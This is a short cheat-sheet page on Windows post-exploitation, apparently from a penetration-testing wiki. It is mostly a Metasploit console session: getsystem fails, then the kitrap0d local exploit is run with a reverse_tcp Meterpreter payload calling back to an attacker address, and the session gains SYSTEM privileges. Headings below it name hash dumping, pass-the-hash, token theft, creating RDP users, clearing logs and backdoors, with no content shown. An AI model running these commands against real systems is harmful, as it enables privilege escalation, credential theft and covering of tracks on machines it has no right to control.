Windows Post Exploitation
#Meterpreter privesc
meterpreter > use priv
meterpreter > getsystem -h
meterpreter > getsystem
meterpreter > getuid
meterpreter > getsystem[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > background
msf exploit(ms10_002_aurora) > use exploit/windows/local/
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 1
msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161
msf exploit(ms10_015_kitrap0d) > set LPORT 4443
msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid
#Server username: NT AUTHORITY\SYSTEM
Hashdump and Pass The Hash
Stealing Tokens (Incognito)
Enable RDP and create User
Clearing logs
Screen Capture
Backdoor
Last updated
Was this helpful?